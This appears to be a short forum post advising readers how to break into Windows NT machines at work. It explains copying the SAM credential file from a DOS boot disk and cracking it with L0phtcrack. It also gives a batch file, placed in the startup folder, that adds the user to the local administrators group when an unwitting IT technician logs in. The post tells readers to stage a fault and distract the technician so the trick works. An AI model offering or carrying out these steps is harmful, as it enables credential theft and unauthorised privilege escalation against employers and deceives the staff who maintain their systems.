there are several good crack programs out there , L0phtcrack 2.5 is very good, search for it and download the latest version. Basically boot the system to a dos disk if the main partition is FAT, and copy the SAM from C:\winnt\system32\config to the disk, then run the crack program and import the SAM file and give it a while and shazam... password will be revealed.

I got this from a magazine I read periodically. If you are in a domain at work and you IT guys normally come to your computer physically you can try this little stunt. Create a file in notepad called logon.bat. This file should like something like this echo off Net localgroup administrators %your-username% /add
Put this file in C:\winnt\profiles\all users\start menu\programs\startup directory. create a small problem for your IT guy to come and fix. He will then log on to your machine with his administrative privileges and while not knowing it your file will convert your simple user to an administrator, only for that computer now! By the way distract the IT from watching this go on as he logs in. Happy Trails
